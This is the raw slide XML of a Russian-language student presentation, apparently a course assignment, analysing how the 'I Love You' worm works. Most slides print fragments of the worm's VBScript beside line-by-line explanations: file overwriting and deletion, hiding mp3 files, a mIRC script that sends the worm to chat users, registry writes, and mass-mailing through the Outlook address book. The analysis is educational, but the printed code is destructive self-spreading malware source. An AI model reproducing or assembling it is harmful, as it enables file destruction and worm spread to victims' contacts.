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88" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="267" r:id="rId7"/>
    <p:sldId id="268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13" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="71" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="-1134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EBC3B55-84F5-49EE-9B6E-7E26ADC53E8E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2B9990E-349F-45AA-B773-E97B6A60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3B55-84F5-49EE-9B6E-7E26ADC53E8E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990E-349F-45AA-B773-E97B6A60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3B55-84F5-49EE-9B6E-7E26ADC53E8E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990E-349F-45AA-B773-E97B6A60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EBC3B55-84F5-49EE-9B6E-7E26ADC53E8E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990E-349F-45AA-B773-E97B6A60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EBC3B55-84F5-49EE-9B6E-7E26ADC53E8E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2B9990E-349F-45AA-B773-E97B6A600BA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BC3B55-84F5-49EE-9B6E-7E26ADC53E8E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B9990E-349F-45AA-B773-E97B6A60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EBC3B55-84F5-49EE-9B6E-7E26ADC53E8E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2B9990E-349F-45AA-B773-E97B6A60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3B55-84F5-49EE-9B6E-7E26ADC53E8E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990E-349F-45AA-B773-E97B6A60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BC3B55-84F5-49EE-9B6E-7E26ADC53E8E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B9990E-349F-45AA-B773-E97B6A60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EBC3B55-84F5-49EE-9B6E-7E26ADC53E8E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2B9990E-349F-45AA-B773-E97B6A60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EBC3B55-84F5-49EE-9B6E-7E26ADC53E8E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2B9990E-349F-45AA-B773-E97B6A60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EBC3B55-84F5-49EE-9B6E-7E26ADC53E8E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B9990E-349F-45AA-B773-E97B6A60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Интернет-червь</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="4800" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>I Love You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022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Принцип работы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71472" y="4607734"/>
            <a:ext cx="8062912" cy="175022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Выполнила: Мухина Е.Н.</a:t>
            </a:r>
          </a:p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b="1" dirty="0" smtClean="0">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Группа: МИ-77</a:t>
            </a:r>
          </a:p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b="1" dirty="0" smtClean="0">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Проверил: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Красов</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0" smtClean="0">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> А.В.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effectLst/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Подпрограмма заражения файлов</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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sub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infectfiles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folderspec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On Error Resume Next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f,f1,fc,ext,ap,mircfname,s,bname,mp3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 f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fso.GetFolder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folderspec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f.Files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 each f1 in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fc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ext=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fso.GetExtensionName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(f1.path)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ext=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lcase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(ext)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lcase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(f1.name)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(ext="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 or (ext="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 then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OpenTextFile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,2,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ap.write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vbscopy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	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ap.close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Проверяются расширения файлов.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Организовываем цикл, просматривая файлы.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Получаем расширение файла.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Переводим все буквы в нижний </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>регист</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, т.е. делаем строчными.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Получаем имя файла.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Осуществляем отбор по нужному разрешению.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Открываем файл для запсиаи-2-указывает на запись</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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Вирус записывает себя вместо содержимого файла. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Закрываем файл</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr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038600" cy="62865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(ext="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 or (ext="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 or (ext="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 or (ext="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wsh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 or (ext="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 or (ext="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 then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OpenTextFile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,2,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write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vbscopy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ap.close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fso.GetBaseName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(f1.path)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 cop=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fso.GetFile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(f1.path)	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cop.copy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folderspec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&amp;"\"&amp;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&amp;".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fso.DeleteFile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(f1.path)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(ext="jpg") or (ext="jpeg") then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OpenTextFile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,2,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ap.write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vbscopy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ap.close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 cop=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fso.GetFile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(f1.path)			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cop.copy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(f1.path&amp;".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fso.DeleteFile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(f1.path)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57167"/>
            <a:ext cx="4038600" cy="58912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600" dirty="0" smtClean="0"/>
              <a:t>Если расширения файлов</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> .JS ; .JSE ; .CSS ; .WSH ; .SCT ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, то вирус также записывает себя вместо них и меняет расширения на .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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Вирус удаляет оригинальные файлы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Определяем базовое имя.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Получаем существующий файл</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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Копируем его в туже  папку, где и находимся, с базовым именем, но уже с другим расширением</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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Удаляем старый файл</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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Тоже самое </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>дя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t> расширения файлов .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>JPG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t> ; .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>JPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t> .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Вирус записывает себя вместо них, меняет расширения на .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t> и удаляет оригинальные файлы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.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1"/>
            <a:ext cx="4038600" cy="27860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(ext="mp3") or (ext="mp2") then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mp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3=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fso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CreateTextFile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&amp;".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vbs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")	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mp3.write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vbscopy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mp3.close</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/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att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fso.GetFile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(f1.path)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att.attributes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=att.attributes+2</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/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if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481"/>
            <a:ext cx="4038600" cy="567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/>
              <a:t>Если расширения файлов .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>MP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>2 ; .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>MP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>3 ,то вирус создает файлы с такими же именами, но расширениями</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> .VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a: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Вирус присваивает оригинальным файлам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> .MP2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>или</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> .MP3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>атрибут</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> «Hidden»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a: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Вирус ищет в системе программу</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> mIRC32 ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>чат</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>, осуществляющую связь с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>чат-серверами</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> и создает при ее наличии файл</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> script.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1500" dirty="0" smtClean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428596" y="4286256"/>
            <a:ext cx="4214842" cy="228601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&lt;&gt;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folderspec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 then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if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then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fso.CreateTextFile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folderspec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&amp;"\script.ini")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500034" y="3286124"/>
            <a:ext cx="8286808" cy="85725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4500" indent="-350838">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Закончив свои деструктивные действия на компьютере пользователя, вирус предпринимает действия для дальнейшего распространения среди пользователей сети </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.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err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> для программы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>mIRC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>32 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="20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5429288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scriptini.WriteLine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"[script]"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scriptini.WriteLine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mIRC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Script"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scriptini.WriteLine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";  Please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dont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edit this script...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mIRC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will corrupt, if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mIRC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will"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scriptini.WriteLine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     corrupt... WINDOWS will affect and will not run correctly. thanks"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scriptini.WriteLine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";"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scriptini.WriteLine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Khaled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Mardam-Bey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scriptini.WriteLine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";http://www.mirc.com"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scriptini.WriteLine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";"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scriptini.WriteLine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"n0=on 1:JOIN:#:{"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scriptini.WriteLine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"n1=  /if ( $nick == $me ) { halt }"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scriptini.WriteLine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"n2=  /.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dcc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send $nick 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dirsystem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&amp;"\LOVE-LETTER-FOR-YOU.HTM"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scriptini.WriteLine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"n3=}"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857884" y="1357299"/>
            <a:ext cx="3071834" cy="48911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600" dirty="0" smtClean="0"/>
              <a:t>В теле </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипта</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t> пишется грозное предупреждение о том, что запрещается редактировать этот </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t> – это приведет к повреждению программы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>mIRC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, а при поврежденной </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>mIRC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t> система не будет работать корректно. Таким образом автор пытается предотвратить попытки пользователя очистить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0"/>
              <a:t> от лишнего содержимого.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Часть </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипта</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> осуществляет рассылку всем участникам чата копии вируса в виде</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> HTM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>файла</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="15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5"/>
            <a:ext cx="4038600" cy="58197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scriptini.close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folderspec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if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if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next  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sub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sub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folderlist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folderspec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  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On Error Resume Next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dim f,f1,sf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f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fso.GetFolder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folderspec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f.SubFolders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for each f1 in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sf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infectfiles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(f1.path)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folderlist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(f1.path)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sub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42917"/>
            <a:ext cx="4038600" cy="5605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Вирус запоминает пути к зараженным файлам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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Организуя цикл просматриваем папки. Как только находим первую папку, то сазу ее открываем, т.е. опять входим в программу, и так до тех пор, пока не будут просмотрены все вложенные папки первой найденной. И так со всеми папками. Папки просмотрены, теперь главное файлы. Но они могут располагаться и на самих дисководах и в папках, которые содержат в себе папки. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>по-этому</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> в цикл просмотра папок ставится вызов еще одной подпрограммы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>infectfiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1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effectLst/>
              </a:rPr>
              <a:t>Подпрограмма создания ключа в реестре</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="20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1635125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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sub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regcreate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regkey,regvalue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regedit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WScript.Shell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	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regedit.RegWrite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regkey,regvalue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sub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1563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/>
              <a:t>Запись ключа в реестр</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="15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85804" y="3214686"/>
            <a:ext cx="8229600" cy="8275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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Подпрограмма чтения ключа в реестр </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ru-RU" sz="20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61962" y="4151329"/>
            <a:ext cx="4038600" cy="163512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regget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(value)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regedit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WScript.Shell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")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regget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regedit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RegRead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)	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end function		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43438" y="4151329"/>
            <a:ext cx="4038600" cy="163512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1500" dirty="0"/>
              <a:t>Проверка записи ключа в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>реестр</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> 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5340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fileexist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filespec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On Error Resume Next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fso.FileExists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filespec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 Then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1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end if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fileexist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end function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folderexist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folderspec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)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On Error Resume Next		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fso.GetFolderExists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folderspec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 then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1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end if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fileexist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end function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14356"/>
            <a:ext cx="4038600" cy="55340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600" dirty="0" smtClean="0"/>
              <a:t>После попытки (удачной или неудачной) распространения своего тела среди участников чата, вирус предпринимает попытку распространения себя по электронной почте, используя при этом программу </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Microsoft Outlook Express</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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Данной процедурой вирус подготавливает отправку сообщений со своей копией по электронной почте</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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Процедура рассылки копий вируса по электронной почте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9212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sub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spreadtoemail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On Error Resume Next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x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad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regedit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WScript.Shell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")			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out=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WScript.CreateObject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Outlook.Application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")      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mapi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out.GetNameSpace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("MAPI")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ctrlists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=1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mapi.AddressLists.Count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a=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mapi.AddressLists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ctrlists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x=1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regv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regedit.RegRead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("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&amp;a)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/>
              <a:t>Вирус</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>получает доступ к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>адресной книге программы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> Outlook Express</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="15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900618" cy="5891235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regv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="") then		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regv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=1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if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a.AddressEntries.Count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)&gt;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regv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)) then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ctrentries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=1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a.AddressEntries.Count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malead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AddressEntries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)	</a:t>
            </a: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=""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regedit.RegRead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("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&amp;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malead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regad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="")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then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male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CreateItem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(0)</a:t>
            </a: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male.Recipients.Add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malead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	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male.Subject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"ILOVEYOU"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male.Body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&amp;"kindly check the attached LOVELETTER coming from me."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male.Attachments.Add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dirsystem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&amp;"\LOVE-LETTER-FOR-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YOU.TXT.vbs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male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Send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9256" y="285728"/>
            <a:ext cx="3257544" cy="614366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Организуется цикл для рассылки по всем адресам адресной книги. </a:t>
            </a:r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Вирус создает тело письма с адресом отправителя, темой и текстом</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a: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Присоединяет к письму файл с телом вируса .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Отсылает письмо адресату.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1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1"/>
            <a:ext cx="4038600" cy="567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regedit.RegWrite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"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&amp;malead,1,"REG_DWORD"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if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x=x+1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next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regedit.RegWrite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"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&amp;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a,a.AddressEntries.Count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500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lse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regedit.RegWrite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“HKEY_CURRENT_USER\Software\Microsoft\WAB\”&amp;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a,a.AddressEntries.Count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if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next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out=Nothing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mapi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=Nothing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sub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481"/>
            <a:ext cx="4038600" cy="56769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Если нет адресной книги, то письма не создаются</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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Краткое описание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 fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Эпидемия вируса "I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>love</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>(The love bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Love latter for you) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t> началась 4 мая 2000 года. Вирус распространяется через электронную почту пользователей </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>Outlook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t>. После открытия файла, приложенного к письму, вирус уничтожает или изменяет некоторые файлы на зараженной машине. Кроме того, червь сразу же, в момент запуска, рассылает себя по всем адресам адресной книги пользователя.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
